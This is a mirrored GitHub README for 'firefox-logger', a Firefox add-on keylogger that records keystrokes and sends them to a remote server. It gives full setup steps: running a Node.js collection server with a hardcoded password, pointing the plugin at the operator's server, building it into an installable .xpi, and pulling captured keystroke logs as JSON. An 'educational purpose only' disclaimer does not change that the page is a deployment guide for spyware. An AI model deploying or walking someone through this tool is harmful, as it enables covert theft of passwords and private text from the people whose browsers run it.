Giter VIP home page Giter VIP logo

firefox-logger's Introduction

firefox-logger

A plugin based mozilla firefox keylogger. It can record keystrokes and send it over the network for server to log.

How to use it?

Setup server

  • Clone the this repository using
$ git clone https://github.com/spl0i7/firefox-logger.git
  • Make sure to install nodejs (4.x) prefered.
  • Change directory to server folder and install dependencies
$ npm install
  • Configure password to view logs by editing app.js
var key = '7thi5i5s0mek3y!!';
  • Configure port to listen by editing
var port = 8080;
  • Start server
npm start

Setup plugin

  • Change directory to plugin
  • Install jpm tool using npm package manager
# npm install jpm --global
  • Change logging server to your own server by editing network.js
var server = "http://127.0.0.1:8080/submit";
  • Test the plugin using jpm
$ jpm run -b $(which firefox)
  • If no errors were thrown untill now, it should work as desired.
  • Plugin can be built into xpi by
$ jpm xpi

Gathering logs

  • Change directory to client.
  • Edit client.js to set appropriate password and server address.
[...]

uri:'http://127.0.0.1:8080/fetch/all';

[...]

key:'7thi5i5s0mek3y!!';
  • This should now throw out logs in json format from the server.

Warning

This package has absolutely no warranty. Use at your own risk. The author will accept no responsibility for any damage, whatsoever, caused by this program, this is meant for educational purpose only.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.